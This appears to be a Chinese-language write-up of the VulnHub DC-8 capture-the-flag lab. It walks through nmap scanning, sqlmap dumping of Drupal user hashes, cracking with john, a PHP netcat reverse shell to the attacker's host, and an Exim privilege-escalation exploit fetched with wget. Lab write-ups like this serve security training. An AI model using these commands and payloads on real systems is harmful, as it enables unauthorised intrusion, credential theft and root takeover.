靶机地址:https://www.vulnhub.com/entry/dc-8,367/
获取靶机IP:192.168.40.187
nmap -sP 192.168.40.0/24
查看靶机开放的端口,开放了22和80端口
nmap -sV -p- 192.168.40.187
访问80端口,是一个 Drupal 的cms
随便测试了一下,该网站存在了SQL注入
sqlmap一条龙
sqlmap -u http://192.168.40.187/?nid=1 --dbs sqlmap -u http://192.168.40.187/?nid=1 -D d7db --tables sqlmap -u http://192.168.40.187/?nid=1 -D d7db -T users --columns sqlmap -u http://192.168.40.187/?nid=1 -D d7db -T users -C name,pass --dump
用户密码被加密过,可以用john来爆破
把密码保存到 passwd.txt 中,然后用 john 爆破出用户密码 turtle
通过dirb扫描目录,找到网站后台登录页面, ip/user,登录之后发现有个页面可以执行代码,来一发反弹shell(踩坑:单写入代码好像不执行,需要加入字符)
<?php system("nc -e /bin/bash 192.168.40.166 4444");?>
随便填一下,点击提交就可以执行反弹shell
成功拿到反弹shell,下一步是提权
找一下能不能用SUID提权
find / -perm -u=s -type f 2>/dev/null
用 searchsploit 发现这个可以提权,提权方法: https://www.exploit-db.com/exploits/46996
用 kali 开一个80端口,然后把 46996.sh 上传到 靶机的 /tmp 目录下(踩坑:46996.sh 需要用vim编辑器打开,执行 :set ff? 如果是dos则需要执行 :set ff=unix ,然后再wq保存,来源于这篇WP)
wget http://192.168.40.166/46996.sh
chmod 777 *
./46996.sh -m netcat
获取flag